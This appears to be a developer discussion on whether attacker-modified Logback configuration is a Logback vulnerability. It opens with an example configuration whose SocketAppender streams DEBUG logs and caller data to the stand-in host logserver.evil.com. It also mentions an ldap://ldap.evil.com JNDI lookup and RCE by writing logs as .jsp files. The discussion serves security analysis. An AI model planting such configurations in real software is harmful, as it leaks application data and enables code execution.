<configuration>
<appender name="SOCKET" class="ch.qos.logback.classic.net.SocketAppender">
<remoteHost>logserver.evil.com</remoteHost>
<port>9999</port>
<includeCallerData>true</includeCallerData>
</appender>
<root level="DEBUG">
<appender-ref ref="SOCKET" />
</root>
</configuration>
If the configuration file is changed as above by the attacker, the log and stack trace information will be leaked.
SocketAppender cannot make remoteHost localhost only, can it? Using logserver.evil.com is not a Logback's vulnerability.
Is using ldap://ldap.evil.com/xx is a Logback's vulnerability ?
I don't think so.
Neither would be a Logback's vulnerability. Moreover, appenders that use the network are not the only ones at risk.
Even with FileAppender, RCE is possible if the output destination of the log file is in the Web application and the extension of the file is jsp.
(Like when CVE-2014-0094(classloader manipulation) was used for RCE.)
Of course, this is not a Logback's vulnerability either. I think as follows.
- The event caused by rewriting the configuration file is not a Logback's vulnerability, but a component vulnerability that caused the configuration file to be rewritten.
- It is dangerous to use JNDI to configure access to untrusted sites. (e.g. JNDI Name = ldap://ldap.untrusted.com/xx .)
- This is because we don't know when the behavior will change.
- This is an application's vulnerability. (It would be nice if the documentation states that you need to be careful.)
|
